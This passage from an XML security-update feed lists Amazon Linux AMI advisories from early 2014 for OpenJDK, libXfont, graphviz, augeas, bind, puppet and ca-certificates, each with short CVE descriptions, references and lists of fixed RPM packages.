</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5878" title="" id="CVE-2013-5878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5884" title="" id="CVE-2013-5884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5893" title="" id="CVE-2013-5893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5896" title="" id="CVE-2013-5896" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5907" title="" id="CVE-2013-5907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5910" title="" id="CVE-2013-5910" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0368" title="" id="CVE-2014-0368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0373" title="" id="CVE-2014-0373" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0376" title="" id="CVE-2014-0376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0411" title="" id="CVE-2014-0411" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0416" title="" id="CVE-2014-0416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0422" title="" id="CVE-2014-0422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0423" title="" id="CVE-2014-0423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0428" title="" id="CVE-2014-0428" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0026.html" title="" id="RHSA-2014:0026" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.51-2.4.4.1.34.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.51-2.4.4.1.34.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.51" release="2.4.4.1.34.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.51-2.4.4.1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-281</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-281: medium priority package update for ca-certificates</title><issued date="2014-01-15 11:58:00" /><updated date="2014-09-16 22:20:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2013:1866.html" title="" id="RHSA-2013:1866" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2012.1.95" release="3.12.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2012.1.95-3.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-282</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-282: important priority package update for libXfont</title><issued date="2014-02-03 15:26:00" /><updated date="2014-09-16 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6462:
A stack-based buffer overflow flaw was found in the way the libXfont library parsed Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could exploit this issue to potentially execute arbitrary code with the privileges of the X.Org server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6462" title="" id="CVE-2013-6462" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0018.html" title="" id="RHSA-2014:0018" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXfont-devel" version="1.4.5" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-devel-1.4.5-3.8.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-debuginfo-1.4.5-3.8.amzn1.x86_64.rpm</filename></package><package name="libXfont" version="1.4.5" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-1.4.5-3.8.amzn1.x86_64.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-devel-1.4.5-3.8.amzn1.i686.rpm</filename></package><package name="libXfont" version="1.4.5" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-1.4.5-3.8.amzn1.i686.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-debuginfo-1.4.5-3.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-283</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-283: important priority package update for java-1.6.0-openjdk</title><issued date="2014-02-03 15:27:00" /><updated date="2014-09-16 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0428:
Multiple improper permission check issues were discovered in the CORBA and JNDI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0423:
It was discovered that the Beans component did not restrict processing of XML external entities. This flaw could cause a Java application using Beans to leak sensitive information, or affect application availability.
CVE-2014-0422:
Multiple improper permission check issues were discovered in the CORBA and JNDI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0416:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0411:
It was discovered that the JSSE component could leak timing information during the TLS/SSL handshake. This could possibly lead to a disclosure of information about the used encryption keys.
CVE-2014-0376:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0373:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0368:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5910:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5907:
An input validation flaw was discovered in the font layout engine in the 2D component. A specially crafted font file could trigger a Java Virtual Machine memory corruption when processed. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2013-5896:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5884:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5878:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5878" title="" id="CVE-2013-5878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5884" title="" id="CVE-2013-5884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5896" title="" id="CVE-2013-5896" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5907" title="" id="CVE-2013-5907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5910" title="" id="CVE-2013-5910" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0368" title="" id="CVE-2014-0368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0373" title="" id="CVE-2014-0373" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0376" title="" id="CVE-2014-0376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0411" title="" id="CVE-2014-0411" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0416" title="" id="CVE-2014-0416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0422" title="" id="CVE-2014-0422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0423" title="" id="CVE-2014-0423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0428" title="" id="CVE-2014-0428" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0097.html" title="" id="RHSA-2014:0097" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-284</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-284: medium priority package update for graphviz</title><issued date="2014-02-03 15:27:00" /><updated date="2014-09-16 22:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-tcl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.30.1-6.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-285</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-285: medium priority package update for graphviz-php</title><issued date="2014-02-03 15:27:00" /><updated date="2014-09-16 22:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-php" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-php" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php-2.30.1-6.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-286</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-286: medium priority package update for augeas</title><issued date="2014-02-03 15:28:00" /><updated date="2014-09-16 22:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6412:
A flaw was found in the way Augeas handled certain umask settings when creating new configuration files. This flaw could result in configuration files being created as world writable, allowing unprivileged local users to modify their content.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6412" title="" id="CVE-2013-6412" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0044.html" title="" id="RHSA-2014:0044" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="augeas" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas-devel" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-devel-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-libs-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-debuginfo-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-1.0.0-5.7.amzn1.i686.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-debuginfo-1.0.0-5.7.amzn1.i686.rpm</filename></package><package name="augeas-devel" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-devel-1.0.0-5.7.amzn1.i686.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-libs-1.0.0-5.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-287</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-287: medium priority package update for bind</title><issued date="2014-02-03 15:28:00" /><updated date="2014-09-16 22:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0591:
A denial of service flaw was found in the way BIND handled queries for NSEC3-signed zones. A remote attacker could use this flaw against an authoritative name server that served NCES3-signed zones by sending a specially crafted query, which, when processed, would cause named to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0591" title="" id="CVE-2014-0591" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0043.html" title="" id="RHSA-2014:0043" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-288</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-288: low priority package update for puppet</title><issued date="2014-02-03 15:28:00" /><updated date="2014-09-16 22:31:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4969:
Puppet before 3.3.3 and 3.4 before 3.4.1 and Puppet Enterprise (PE) before 2.8.4 and 3.1 before 3.1.1 allows local users to overwrite arbitrary files via a symlink attack on unspecified files.
1045212:
CVE-2013-4969 Puppet: Unsafe use of Temp files in File type
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969" title="" id="CVE-2013-4969" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-debuginfo" version="2.7.25" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.25-1.2.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.25" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.25-1.2.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.25" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.25-1.2.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.25" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.25-1.2.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.25" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.25-1.2.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.7.25" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.25-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-289</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-289: medium priority package update for kernel</title><issued date="2014-02-26 14:26:00" /><updated date="2014-09-16 22:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
